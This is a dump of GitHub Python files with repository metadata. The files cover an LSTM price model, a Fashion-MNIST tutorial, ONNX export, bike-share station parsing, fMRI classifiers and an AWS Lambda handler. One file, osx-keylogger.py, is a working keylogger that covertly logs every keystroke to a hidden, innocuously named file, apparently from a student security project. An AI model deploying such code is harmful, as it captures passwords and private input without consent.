tmp_x = futuredata.loc[i:(i + window_width - 1),
['open', 'close', 'high', 'low', 'volume']]
x_all.append(np.log(tmp_x.close.values / tmp_x.open.values))
tmp_y = futuredata.loc[(i + window_width),
['open', 'close', 'high', 'low']]
flag_bar = np.log(tmp_y['close'] / tmp_y['open'])
y_all.append(flag_bar)
print(i)
x_all_np = np.array(x_all)
x_all_np = np.expand_dims(x_all_np, axis=2)
y_all_np = np.array(y_all)
x_train, x_test, y_train, y_test = train_test_split(
x_all_np, y_all_np, test_size=0.1, random_state=100)
model = Sequential()
# LSTM
model.add(LSTM(8, return_sequences=False, input_shape=(window_width, 1)))
# model.add(GlobalAveragePooling1D())
model.add(Dense(1))
model.summary()
#model.compile(loss='mean_squared_error', optimizer='rmsprop', metrics=['mae'])
model.compile(loss='mean_squared_error',
optimizer='rmsprop', metrics=[r2_keras])
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
validation_data=(x_test, y_test))
|
[
"renmin0424@gmail.com"
] |
renmin0424@gmail.com
|
594dbb31b0d629c64a673c8ac53bf5da344c901d
|
201b528383548ec9e4cdea8d92fe42566b03d9f2
|
/Z_7-1.py
|
08064964037cabfb6a81ef88fea0c7f095137192
|
[] |
no_license
|
INePro/Projrct
|
7963fdb1afc02f293e42770718fa759981a9524a
|
896d389b95eeddc6bff84740950f83ba9024b74e
|
refs/heads/master
| 2023-05-21T18:25:32.142853
| 2021-06-12T11:25:17
| 2021-06-12T11:25:17
| 376,272,808
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 561
|
py
|
#СОЗДАЕМ ВЕЧНЫЙ ЦИКЛ
while True:
#ДЛЯ ИЗБЕЖАНИЯ ОШИБОК
try:
#ПРИСВАИВАЕМ ЗНАЧЕНИЯ ПЕРЕМЕННЫМ
n = int(input("Какое расстояние проезжает машина за день: "))
m = int(input("Какое расстояние нужно проехать машине: "))
Time = m / n
print("Машине нужно ", Time," дня/дней")
#ВЫВОД ТЕКСТА ПОДСКАЗКИ
except ValueError:
print("Нужно ввести целое число")
|
[
"starikov.vitaliy.03@bk.ru"
] |
starikov.vitaliy.03@bk.ru
|
c799ae912f28a196e49bada2acad57ee6f99323e
|
f0e9e10d2b2b60d820ea2184fda449d79a2d6550
|
/basic_classification.py
|
da4b580a3f9fa9c898f82f96a696fd88b4dc7569
|
[] |
no_license
|
Pasenger/tensorflow-tutorials
|
da1256fc7e493a464e1e10a36a6269300c459110
|
a7a3cb04acddb27f5747d42bf4942370bef26f7f
|
refs/heads/master
| 2020-05-03T14:55:38.214282
| 2019-04-05T13:22:25
| 2019-04-05T13:22:25
| 178,691,836
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,773
|
py
|
# -*-conding:utf-8 -*-
# =====================================
# 基本分类
# https://tensorflow.google.cn/tutorials/keras/basic_classification
# =====================================
# Tensorflow and tf.keras
import tensorflow as tf
from tensorflow import keras
# Helper libraries
import numpy as np
import matplotlib.pyplot as plt
print(tf.__version__)
# 导入Fashion MNIST数据集, 下载目录在:C:\Users\Pasenger\.keras\datasets\fashion-mnist
fashion_mnist = keras.datasets.fashion_mnist
# 加载数据集会返回4个Numpy数组
# 训练集:train_images, train_labels
# 测试集:test_images, test_labels
(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()
# 每张图片都映射到一个标签
class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',
'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
print(train_images.shape)
# (60000, 28, 28)
print(test_images.shape)
# (10000, 28, 28)
# 预处理数据
plt.figure()
plt.imshow(train_images[0])
plt.colorbar()
plt.grid(False)
plt.show()
# 图像:长:28, 宽:28, 高:255
# 我们将这些值缩小到 0 到 1 之间,然后将其馈送到神经网络模型。为此,将图像组件的数据类型从整数转换为浮点数,然后除以 255。以下是预处理图像的函数:
train_images = train_images / 255.0
test_images = test_images / 255.0
plt.figure()
plt.imshow(train_images[0])
plt.colorbar()
plt.grid(False)
plt.show()
plt.figure(figsize=(10, 10))
for i in range(25):
plt.subplot(5, 5, i + 1)
plt.xticks([])
plt.yticks([])
plt.grid(False)
plt.imshow(train_images[i], cmap=plt.cm.binary)
plt.xlabel(class_names[train_labels[i]])
plt.show()
# 构建模型
# 设置层
# 神经网络的基本构造块是层。层从馈送到其中的数据中提取表示结果。希望这些表示结果有助于解决手头问题。
# 大部分深度学习都会把简单层连接在一起,大部分层都具有在训练期间要学习的参数。
model = keras.Sequential([
# 第一层: 将图像格式从二维数组(28 * 28像素)转换成一维数组(28 * 28 = 784像素)
# 可以将该层视为图像中像素未堆叠的行,并排列这些行。
# 该层没有需要学习的参数,只改动数据的格式。完成扁平化
keras.layers.Flatten(input_shape=(28, 28)),
# 第一个Dense层:具有128个节点(或神经元)
keras.layers.Dense(128, activation=tf.nn.relu),
# 第二个Dense层:具有10个节点的softmax层,返回一个具有10个概率得分的数组,这些得分总和为1
# 用来表示当前图像属于10个类别中某一个的概率
keras.layers.Dense(10, activation=tf.nn.softmax)
])
# 编译模型
# 模型还需要进行迹象设置才可以开始训练:
# 损失函数:衡量模型在训练期间的准确率。
# 优化器:根据模型看到的数据及其损失函数更新模型的方式
# 指标:用于监控训练和测试步骤
model.compile(
optimizer=tf.train.AdamOptimizer(),
loss='sparse_categorical_crossentropy',
metrics=['accuracy']
)
# 训练模型
# 训练模型需要执行以下步骤:
# 1. 将训练数据馈送到模型中,本例中为train_iamges和tarin_labels数组
# 2. 模型学习将图像与标签相关联
# 3. 要求模型对测试集进行预测,本例中为test_iamges数据,会验证预测结果是否与test_labels数组中的标签一致
# 开始训练,请调用model.fit方法,使模型与训练数据“拟合”
model.fit(train_images, train_labels, epochs=5)
# 评估准确率
test_loss, test_acc = model.evaluate(test_images, test_labels)
print('Test accuracy: ', test_acc)
# 结果表明,模型在测试数据集上的准确率略低于在训练数据集上的准确率。
# 训练准确率和测试准确率之间的这种差异表示出现过拟合。
# 如果机器学习模型在新数据上的表现不如在训练数据上的表现,就表示出现过拟合。
# 做出预测
# 模型经过训练后,可以使用它对一些图像进行预测
predictions = model.predict(test_images)
# 查看第一个预测结果
print(predictions[0])
# 查看可可信度最大的标签
print('预测:', np.argmax(predictions[0]))
print('实际:', test_labels[0])
# 将预测结果绘制成图来查看全部10个通道
def plot_image(i, predictions_array, true_label, img):
predictions_array, true_label, img = predictions_array[i], true_label[i], img[i]
plt.grid(False)
plt.xticks([])
plt.yticks([])
plt.imshow(img, cmap=plt.cm.binary)
predicted_label = np.argmax(predictions_array)
if predicted_label == true_label:
color = 'blue'
else:
color = 'red'
plt.xlabel("P:{} {:2.0f}% (T:{})".format(
class_names[predicted_label],
100 * np.max(predictions_array),
class_names[true_label]
), color=color)
def plot_value_array(i, predictions_array, true_label):
predictions_array, true_label = predictions_array[i], true_label[i]
plt.grid(False)
plt.xticks([])
plt.yticks([])
thisplot = plt.bar(range(10), predictions_array, color="#777777")
plt.ylim([0, 1])
predicted_label = np.argmax(predictions_array)
thisplot[predicted_label].set_color('red')
thisplot[true_label].set_color('blue')
# 第0张
i = 0
plt.figure(figsize=(6, 3))
plt.subplot(1, 2, 1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(1, 2, 2)
plot_value_array(i, predictions, test_labels)
i = 12
plt.figure(figsize=(6, 3))
plt.subplot(1, 2, 1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(1, 2, 2)
plot_value_array(i, predictions, test_labels)
plt.show()
# Plot the first X test images, their predicted label, and the true label
# Color correct predictions in blue, incorrect predictions in red
num_rows = 5
num_cols = 3
num_images = num_rows * num_cols
plt.figure(figsize=(2 * 2 * num_cols, 2 * num_rows))
for i in range(num_images):
plt.subplot(num_rows, 2 * num_cols, 2 * i + 1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(num_rows, 2 * num_cols, 2 * i + 2)
plot_value_array(i, predictions, test_labels)
plt.show()
# 使用经过训练的模型对单个图像进行预测
# tf.keras 模型已经过优化,可以一次性对样本批次或样本集进行预测。因此,即使我们使用单个图像,仍需要将其添加到列表中:
img = test_images[0]
img = (np.expand_dims(img, 0))
predictions_single = model.predict(img)
print('预测结果: ', predictions_single)
print('预测值:', np.argmax(predictions_single[0]))
plot_value_array(0, predictions_single, test_labels)
_ = plt.xticks(range(10), class_names, rotation=45)
|
[
"pasenger@163.com"
] |
pasenger@163.com
|
0b52aac1d9e5125479b4c19167f891026dc3bac0
|
df5096d59715c1a299a0389e249721d8bdf58927
|
/test/test_basic.py
|
cb9a73b58dcd315bb577366be7c9642ccca74e65
|
[] |
no_license
|
tomektester/test
|
d54f65f059fb861abda578ab7fc474b05290147a
|
a345ec99f6322c6bd1be8fc6fbc8c47004665cc4
|
refs/heads/master
| 2021-01-21T13:36:49.578450
| 2013-02-21T00:24:40
| 2013-02-21T00:24:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 231
|
py
|
import unittest
class BasicTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_1(self):
self.assertEqual(1,1)
def test_2(self):
self.assertEqual(2,2)
|
[
"tomek.rej@roamz.com"
] |
tomek.rej@roamz.com
|
cde71d39be2ed5096c0281a31c80792286949fab
|
65f3ac35a9bc700c6a5d54d14256322413285429
|
/model_transfer/model2onnx_batch.py
|
3baa3e710c413421dcf73a7c1c489b76a9d1d5c4
|
[] |
no_license
|
yangyubuaa/Web_Server_For_TFServing
|
08d4c0ee92302d1b9e511b384909fce2f5078e52
|
c50189a7372c3369ae00b63e33e01b98f119a7a1
|
refs/heads/master
| 2023-06-11T00:02:38.497914
| 2021-07-06T06:51:59
| 2021-07-06T06:51:59
| 382,998,472
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,545
|
py
|
import torch
from transformers import AlbertForSequenceClassification, BertTokenizer
def torchmodel2onnx():
# 设置batchsize和输入的最大长度
Batch_size = 1
seg_length = 64
# 读取训练好的模型
model_path = "albert_tiny_pytorch"
albert_model = AlbertForSequenceClassification.from_pretrained(model_path)
# 将模型置于eval模式
albert_model.eval()
# 随机初始化模型输入
dummy_input0 = torch.zeros(Batch_size, seg_length).long()
dummy_input1 = torch.zeros(Batch_size, seg_length).long()
dummy_input2 = torch.zeros(Batch_size, seg_length).long()
# 将pytorch模型导出为onnx格式
torch.onnx.export(albert_model,
(dummy_input0, dummy_input1, dummy_input2),
"output.onnx",
input_names=["input_ids", "token_type_ids", "attention_mask"],
output_names=["loss", "logits", "hidden_states", "attentions"],
dynamic_axes = {'input_ids' : {0 : 'batch_size'},
'token_type_ids' : {0 : 'batch_size'},
'attention_mask' : {0 : 'batch_size'},
'loss' : {0 : 'batch_size'},
'logits' : {0 : 'batch_size'},
'hidden_states' : {0 : 'batch_size'},
'attentions' : {0 : 'batch_size'}},
opset_version=12)
if __name__ == '__main__':
torchmodel2onnx()
|
[
"minghaiyan@sogou-inc.com"
] |
minghaiyan@sogou-inc.com
|
8933aa2068fbd93ab8574d7b2cc34be3417a4673
|
701a5781a31207a248caa93e267a8e43c9dba48a
|
/gbfs/gbfs.py
|
266334ee44a2f4f71c65eefbc4bc3e394ef0b5a0
|
[
"BSD-2-Clause"
] |
permissive
|
jdswinbank/gbfs
|
1160f6bb5bbf798b40369efb9f0bc6d701c86a42
|
5c4a44da1e4ab404d3ad08dad31fe3ae88edd478
|
refs/heads/master
| 2016-09-14T07:07:14.495828
| 2016-05-02T02:10:24
| 2016-05-02T02:10:24
| 57,861,182
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,783
|
py
|
import enum
import json
import math
import time
from collections import namedtuple
#import requests
__all__ = ["Position", "haversine", "EARTH_RADIUS", "StationCollection",
"Station", "RentalMethod"]
EARTH_RADIUS = 6371.0 # km
class RentalMethod(enum.Enum):
"""
All possible rental methods in standard as of 2016-05-01.
"""
# This may be gratuitous: additional methods can be added in future, so
# locking down the enumeration will just cause breakage. Useful for
# sanity checking for now, though.
KEY = 0
CREDITCARD = 1
PAYPASS = 2
APPLEPAY = 3
ANDROIDPAY = 4
TRANSITCARD = 5
ACCOUNTNUMBER = 6
PHONE = 7
# Angles measured in degrees
Position = namedtuple('Position', ['lon', 'lat'])
def haversine(pos1, pos2):
# https://en.wikipedia.org/wiki/Haversine_formula
delta_lat = math.radians(pos2.lat - pos1.lat)
delta_lon = math.radians(pos2.lon - pos1.lon)
return EARTH_RADIUS * 2 * math.asin(math.sqrt(math.sin(delta_lat/2)**2
+ math.cos(math.radians(pos1.lat))
* math.cos(math.radians(pos2.lat))
* math.sin(delta_lon/2)**2))
class StationCollection(object):
def __init__(self, ttl, last_updated, stations):
self.ttl = ttl
self.last_updated = last_updated
self.stations = list(stations)
def __getitem__(self, *args, **kwargs):
return self.stations.__getitem__(*args, **kwargs)
def __len__(self):
return len(self.stations)
def near(self, position, radius=None):
"""
Find stations near ``position``.
Returns a list of (station, distance) tuples for all stations within
``radius`` km of ``position``, sorted by distance.
"""
return [(station, haversine(position, station.position))
for station in self
if radius is None
or haversine(position, station.position) <= radius]
@staticmethod
def from_json(info, status=None):
"""
Parse GBFS-style JSON and return a StationCollecton.
"""
ttl = int(info['ttl'])
last_updated = int(info['last_updated'])
stations = [Station(**data) for data in info['data']['stations']]
collection = StationCollection(ttl, last_updated, stations)
if status:
collection.update_status()
return collection
@property
def valid(self):
"""
Return True if the ``last_updated`` time is more recent than the TTL.
"""
return (time.time() - self.last_updated) <= self.ttl
def get_id(self, station_id):
"""
Return a station with ID ``station_id``, or ``None``.
"""
# Probably StationCollection should actually be a mapping of
# station_id -> station. But it's not at the moment.
for station in self.stations:
if station.station_id == station_id:
return station
return None
class Station(object):
# Optional fields in the GBFS spec, provided as pairs of (field_name,
# callable), where callable is used to cast whatever input is provided to
# an appropriate type.
OPTIONAL_FIELDS = [("short_name", str),
("address", str),
("cross_street", str),
("region_id", str),
("post_code", str),
("rental_methods", lambda x: {getattr(RentalMethod, y)
for y in x}),
("capacity", int)]
def __init__(self, station_id, name, lon, lat, **kwargs):
self.station_id = str(station_id)
self.name = str(name)
self.position = Position(float(lon), float(lat))
# All optional fields (ie, as defined in the spec) are set to None if
# they don't exist.
for field_name, field_type in self.OPTIONAL_FIELDS:
try:
value = field_type(kwargs.pop(field_name))
except KeyError:
value = None
setattr(self, field_name, value)
# Fields which aren't defined in the spec are also saved; this is
# relevant for e.g. Citibike's eightd_has_key_dispenser.
for field, value in kwargs.items():
setattr(self, field, value)
# Initialize the station so that relevant attributes are set even if
# the status hasn't yet been retrieved.
self.status = {}
self.push_status(-1, -1, False, False, False, -1)
def push_status(self, num_bikes_available, num_docks_available,
is_installed, is_renting, is_returning, last_reported,
**kwargs):
self.last_reported = int(last_reported)
self.status[self.last_reported] = {
"num_bikes_available": int(num_bikes_available),
"num_docks_available": int(num_docks_available),
"is_installed": bool(is_installed),
"is_renting": bool(is_installed),
"is_returning": bool(is_installed),
}
@property
def age(self):
"""
Return the age of the station status, in seconds.
Or -1 if status information is not available.
"""
if self.last_reported >= 0:
return time.time() - self.last_reported
else:
return -1
def __getattr__(self, attrname):
try:
return self.status[self.last_reported][attrname]
except KeyError:
raise AttributeError(attrname)
def __repr__(self):
return 'Station(%r, %r)' % (self.station_id, self.name)
|
[
"john@swinbank.org"
] |
john@swinbank.org
|
f62dcd6c599826a31e28c742e85d598e3375d3a3
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2224/60677/295560.py
|
f653bfac240a0f0bbc5bd8f5352722c814c3e233
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 425
|
py
|
zzh=input()
zzh=list(zzh)
zzh=[int(x) for x in zzh]
zzhbig=zzh.copy()
zzhbig.sort(reverse=True)
length=zzh.__len__()
first=0
for i in range(length):
first=i
if zzh[i]!=zzhbig[i]:
break
if first!=length-1:
big=first
for i in range(first+1,length):
if zzh[i]>=zzh[big]:
big=i
swap=zzh[first]
zzh[first]=zzh[big]
zzh[big]=swap
zzh=[str(x) for x in zzh]
print("".join(zzh))
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
39f1958826c911b974880e4fe9300acc47ed4602
|
1109202b193ab1e1e8e38ba08889b4afd020bd54
|
/fMRI.py
|
cbf5ea3c795821469687420b6429fd61f738d0d9
|
[] |
no_license
|
SriganeshNk/fMRI
|
1058499772bd2529bc410aa1e3957c351599dcaa
|
32e2a51001e18b11b3837cdd57a77bba7174b9e3
|
refs/heads/master
| 2021-01-21T05:01:49.417321
| 2015-05-08T23:26:12
| 2015-05-08T23:26:12
| 34,079,485
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,851
|
py
|
__author__ = 'Sriganesh'
import scipy.io
import math
from sklearn import svm
import numpy as np
from sklearn.naive_bayes import GaussianNB
from sklearn.neighbors import KNeighborsClassifier
from matplotlib import pyplot as plt
from scipy.sparse import csr_matrix
from scipy.sparse.csgraph import minimum_spanning_tree
import networkx as nx
import random
from scipy.stats import norm
from sklearn.metrics import accuracy_score
from sklearn.metrics import precision_recall_fscore_support
def loadData(filename):
data = scipy.io.loadmat(filename)
labels, index = getLabels(data['i'])
trials = []
k = 0
for y in data['d']:
if k in index:
k += 1
continue
i = 0
while i < 32:
trials.append(y[0][i])
i += 1
k += 1
return trials, labels
def getLabels(info):
labels = []
indexes = []
i = 0
for x in info[0]:
if x[0][0] == 0 or x[0][0] == 1:
indexes.append(i)
i += 1
continue
if x[len(x)-1][0] == 'P':
for k in range(0,16):
labels.append('P')
for k in range(0,16):
labels.append('S')
else:
for k in range(0,16):
labels.append('S')
for k in range(0,16):
labels.append('P')
i += 1
return labels, indexes
def cross_validate(traindata, trainlabels):
n = 16
i = 0
k_val = [1, 3, 7, 9, 15]
linearSVM, Gauss, knn = [],[],[]
while i < n:
train, tlabel, test, label = CVsplit(traindata,trainlabels, i)
L = []
clf = svm.SVC(C=5000, kernel='linear')
L.append(fitAndPredict(clf,train,tlabel,test,label))
linearSVM.append(L)
clf = GaussianNB()
Gauss.append(fitAndPredict(clf,train,tlabel,test,label))
L = []
for j in k_val:
if j < len(train[0]):
clf = KNeighborsClassifier(n_neighbors=j)
L.append(fitAndPredict(clf,train,tlabel,test,label))
if len(L) > 0:
knn.append(L)
i += 1
line1, = plt.plot(linearSVM, label= "SVM with C=5000")
line2, = plt.plot(Gauss, label= "Gaussian")
X = np.asarray(knn)
line3, leg3 = [line1, line2], ["SVM with C=5000","Gaussian"]
for i in range(len(knn[0])):
line, = plt.plot(X[:,i], label = str(k_val[i])+"nn")
line3.append(line)
leg3.append(str(k_val[i])+"nn")
plt.legend(line3,leg3)
plt.show()
def fitAndPredict(clf, traindata, trainlabels, testdata, testlabels):
clf.fit(traindata, trainlabels)
i , correct = 0, 0
for x in testdata:
if testlabels[i] == clf.predict(x):
correct += 1
i += 1
return float(correct)/float(len(testlabels))
def shuffle(data, labels):
start = len(data) - (6*len(data)/10)
end = len(data) - (5*len(data)/10)
x = [i for i in range(len(data))]
random.shuffle(x)
traindata = [data[i] for i in x[:start]]
traindata.extend([data[i] for i in x[end:]])
trainlabels = [labels[i] for i in x[:start]]
trainlabels.extend([labels[i] for i in x[end:]])
testdata = [data[i] for i in x[start:end]]
testlabels = [labels[i] for i in x[start:end]]
return (traindata,trainlabels,testdata,testlabels)
def trainAndtest(traindata, trainlabels, testdata, testlabels):
clf = svm.SVC(C=5000,kernel="linear")
linearSVM = fitAndPredict(clf, traindata, trainlabels,testdata, testlabels)
Gauss = GaussianNB()
Gaussian = fitAndPredict(Gauss, traindata, trainlabels,testdata, testlabels)
neigh = KNeighborsClassifier(n_neighbors=7)
knn = fitAndPredict(neigh, traindata, trainlabels,testdata, testlabels)
print "Test accuracies:"
print "SVM:", linearSVM
print "GNB:", Gaussian
print "KNN:", knn
def getClassConditionalData(data, labels):
dataP, dataS = [], []
for i in range(len(data)):
if labels[i] == 'P':
dataP.append(data[i])#[j] for j in range(len(data[i]))])
if labels[i] == 'S':
dataS.append(data[i])#[j] for j in range(len(data[i]))])
dataP = np.transpose(dataP)
dataS = np.transpose(dataS)
return dataP, dataS
def getClassProbability(labels):
s, p = 0, 0
for x in labels:
if x == 'S':
s += 1
if x == 'P':
p += 1
Pp = float(p)/float(len(labels))
Ps = float(s)/float(len(labels))
return Pp, Ps
def getParam(data):
Params = []
for x in data:
Mu = np.mean(x)
Sigma = np.var(x)
Params.append((Mu, Sigma))
return Params
def CVsplit(traindata, trainlabels, i=5):
n = 16
limit = len(traindata)/n
start = i * limit
end = (i+1) * limit
if start == 0:
train = traindata[end:]
tlabel = trainlabels[end:]
if end == len(traindata):
train = traindata[:start]
tlabel = trainlabels[:start]
if start != 0 and end != len(traindata):
train = traindata[:start]
train.extend(traindata[end:])
tlabel = trainlabels[:start]
tlabel.extend(trainlabels[end:])
test = traindata[start:end]
label = trainlabels[start:end]
return train,tlabel,test,label
def learnStructure(dataP, dataS, Pp, Ps, R = 0.005):
tempMatrix = [[0 for i in range(len(dataP))] for j in range(len(dataP))]
for i in range(len(dataP)):
for j in range(i+1, len(dataP)):
try:
temp = Pp * math.log(1-((np.corrcoef(dataP[i], dataP[j])[0][1] - R)**2))
temp += Ps * math.log(1-((np.corrcoef(dataS[i], dataS[j])[0][1] - R)**2))
temp *= (0.5)
tempMatrix[i][j] = temp
except ValueError:
print "DATA1:", dataP[i]
print "DATA2:", dataP[j]
print "Correlation coefficient:", np.corrcoef(dataP[i], dataP[j])[0][1]
#print tempMatrix
G = nx.from_scipy_sparse_matrix(minimum_spanning_tree(csr_matrix(tempMatrix)))
MaxG = nx.DiGraph()
adjList = G.adjacency_list()
notReturnable = {}
i = 0
MaxG = getDirectedTree(adjList, notReturnable, MaxG, i)
#nx.draw_random(MaxG)
#plt.show()
return MaxG
def getDirectedTree(adjList, notReturnable, MaxG, i):
x = adjList[i]
L = []
for y in x:
if y not in notReturnable:
notReturnable[y] = {}
if i not in notReturnable:
notReturnable[i] = {}
if i not in notReturnable[y] and y not in notReturnable[i]:
MaxG.add_edge(i, y)
L.append(y)
notReturnable[y][i] = 1
notReturnable[i][y] = 1
for y in L:
MaxG = getDirectedTree(adjList,notReturnable,MaxG, y)
return MaxG
def infer(Tree, data, testdata):
Param = getParam(data)
# Do topological sort to figure out nodes with least number of dependence
Nodes = nx.topological_sort(Tree)
Prod = 10.0**400
for i in Nodes:
mean, Var = Param[i]
Sum = 0
L = []
for x in Tree.predecessors(i):
if x != i:
Parentmean, ParentVar = Param[x]
PCov = np.cov([data[i], data[x]])[0][1]
PBeta = PCov/ParentVar
Sum += PBeta * (testdata[x] - Parentmean)
L.append(x)
mean += Sum
if len(L) > 0:
Depend = [data[i]]
num, dem = 0, 0
for k in L:
Depend = np.vstack((Depend, data[k]))
Parent = Depend[1:]
if len(Parent) > 2:
num = np.linalg.det(np.cov(Depend))
dem = np.linalg.det(np.cov(Parent))
#print "1 COV:" ,num, dem
if len(Parent) == 2:
num = np.linalg.det(np.cov(Depend))
dem = np.linalg.det(np.cov(Parent)) + 0.0000001
#print "2 COV:", num, dem
if len(Parent) == 1:
num = np.linalg.det(np.cov(Depend)) + 0.0000001
dem = np.var(Parent)
#print "3 COV:", num, dem
Var = num / dem
Std = math.sqrt(Var)
rv = norm(loc=mean, scale=Std)
if rv.pdf(testdata[i]) > 0.0000001:
Prod *= rv.pdf(testdata[i])
return Prod
def cv_TAN(traindata, trainlabels, R=0.005):
n = 16
i = 0
Accuracy = []
while i < n:
train, tlabel, test, label = CVsplit(traindata, trainlabels, i)
dataP, dataS = getClassConditionalData(train, tlabel)
Pp, Ps = getClassProbability(tlabel)
Tree = learnStructure(dataP, dataS, Pp, Ps, R)
mylabel = []
for x in test:
PProd = Pp * infer(Tree, dataP, x)
SProd = Ps * infer(Tree, dataS, x)
temp = PProd + SProd
PProd = PProd/temp
SProd = SProd/temp
if SProd >= PProd:
mylabel.append('S')
else:
mylabel.append('P')
Accuracy.append(accuracy_score(label, mylabel))
#print "Accuracy:", float(correct)/float(len(label))
#print "Accuracy: attempt",i, ": ", accuracy_score(label, mylabel)
#print "(Precision, Recall, F1-Score)", precision_recall_fscore_support(label, mylabel)
i += 1
return sum(Accuracy)/len(Accuracy)
if __name__ == "__main__":
data, labels = loadData("active500.mat")
TANAcc, GaussAcc = [], []
for y in range(1):
traindata, trainlabels, testdata, testlabels = shuffle(data, labels)#CVsplit(data, labels)
#temp = cv_TAN(traindata,trainlabels)
#print "CV", temp
dataP, dataS = getClassConditionalData(traindata, trainlabels)
Pp, Ps = getClassProbability(trainlabels)
Tree = learnStructure(dataP, dataS, Pp, Ps)
mylabel = []
for x in testdata:
PProd = Pp * infer(Tree, dataP, x)
SProd = Ps * infer(Tree, dataS, x)
temp = PProd + SProd
PProd = PProd/temp
SProd = SProd/temp
if SProd >= PProd:
mylabel.append('S')
else:
mylabel.append('P')
TANAcc.append(accuracy_score(testlabels,mylabel))
#print "Accuracy:", accuracy_score(testlabels, mylabel)
#print "(Precision, Recall, F1-Score)", precision_recall_fscore_support(testlabels,mylabel)
Gauss = GaussianNB()
#print "Gaussian:", fitAndPredict(Gauss, traindata, trainlabels,testdata, testlabels)
GaussAcc.append(fitAndPredict(Gauss, traindata, trainlabels, testdata, testlabels))
print "TAN:", sum(TANAcc)/len(TANAcc)
print "GAUSS:", sum(GaussAcc)/len(GaussAcc)
#cross_validate(traindata,trainlabels)
#clf, Gauss, neigh = cross_validate(traindata,trainlabels)
#trainAndtest(traindata, trainlabels, testdata,testlabels)"""
|
[
"sriganesh.navaneethakrishnan@stonybrook.edu"
] |
sriganesh.navaneethakrishnan@stonybrook.edu
|
89ffc31de335cf350cd6134d4c7c876e058d339a
|
7f666c62a4e02a9688beede315c5b79831307679
|
/osx-keylogger.py
|
632a08f9e62e8d04e2a53df3dba7057142c4c7be
|
[] |
no_license
|
ianng31/something-awesome
|
3f8520191f39f2f87ddafc31f7ed350df329828a
|
55c5d918aefb4f558f227d846dc20aa9f4cb2f77
|
refs/heads/master
| 2022-11-25T20:39:00.654518
| 2020-08-03T13:32:11
| 2020-08-03T13:32:11
| 254,847,276
| 0
| 1
| null | 2020-08-03T13:32:12
| 2020-04-11T10:51:37
|
Python
|
UTF-8
|
Python
| false
| false
| 1,086
|
py
|
#!/usr/bin/python
import pynput.keyboard
import smtplib
import threading
import os
from pathlib import Path
class Keylogger:
def __init__(self):
#constructor
HOME = str(Path.home())
self.filepath = f"{HOME}/.not_a_keylogger.txt"
self.header = "[ Initiating Logging ]\n"
def evaluate_keys(self, key):
try:
# This will not throw exceptions when encountering a special character
Pressed_key = str(key.char)
except AttributeError:
if key == key.space: # Show actual space instead of key.space
Pressed_key = " "
elif key == key.enter:
Pressed_key = "\n"
else:
Pressed_key = " " + str(key) + " "
#Now appending the key pressed
self.log(Pressed_key)
def log(self, logger_text):
FILE_MODE = "a+"
with open(f'{self.filepath}', FILE_MODE) as logfile:
logfile.write(logger_text)
def start(self):
keyboard_listener = pynput.keyboard.Listener(on_press=self.evaluate_keys)
with keyboard_listener:
self.log(self.header)
keyboard_listener.join()
if __name__ == "__main__":
my_keylogger = Keylogger()
my_keylogger.start()
|
[
"z5257343@unsw.edu.au"
] |
z5257343@unsw.edu.au
|
a7e4199230593411dcc6621ba9314e67f00f7537
|
d54d97946c90c7b96fd27a174c29ef94093d461a
|
/S2_Mobilenet_QuadCopters_Lambda/AWS Lambda Files/handler.py
|
6e76e06c0157bc575380fe11fbff98f7a321f3ec
|
[
"MIT"
] |
permissive
|
pranavpandey2511/Deep_Learning_EVA4_Phase2
|
b13a281b1b0d18c4a344484334984d3f2b702e4d
|
b01045c051184f627df6e9e8e26ec5a057c01d3a
|
refs/heads/master
| 2023-04-01T20:44:46.104454
| 2021-04-04T13:21:29
| 2021-04-04T13:21:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,129
|
py
|
try:
print('Import unzip')
import unzip_requirements
except ImportError:
pass
import torch
import torchvision
import torchvision.transforms as transforms
from PIL import Image
import boto3
import os
import io
import json
import base64
from requests_toolbelt.multipart import decoder
print("Import End.....")
#define env-variables - if none exists
S3_BUCKET = os.environ['S3_BUCKET'] if 'S3_BUCKET' in os.environ else 'eva4p2-s2-anilbhatt1'
MODEL_PATH = os.environ['MODEL_PATH'] if 'MODEL_PATH' in os.environ else 's2_mobilenetv2.pt'
print('Downloading Model....')
s3 = boto3.client('s3')
try:
if os.path.isfile(MODEL_PATH) != True:
obj = s3.get_object(Bucket=S3_BUCKET, Key=MODEL_PATH)
print('creating bytestream')
bytestream = io.BytesIO(obj['Body'].read())
print('Loading Model...')
model = torch.jit.load(bytestream)
print('Model loaded...')
except Exception as e:
print(repr(e))
raise(e)
def transform_image(image_bytes):
try:
transformations = transforms.Compose([
transforms.Resize(255),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485,0.456,0.406], std=[0.229,0.224,0.225])])
image = Image.open(io.BytesIO(image_bytes))
return transformations(image).unsqueeze(0)
except Exception as e:
print(repr(e))
raise(e)
def get_prediction(image_bytes):
tensor = transform_image(image_bytes=image_bytes)
print('Transformed the image')
return model(tensor).argmax().item()
def classify_image(event, context):
try:
content_type_header = event['headers']['content-type']
print(event['body'])
body = base64.b64decode(event['body'])
print('Body Loaded')
picture = decoder.MultipartDecoder(body, content_type_header).parts[0]
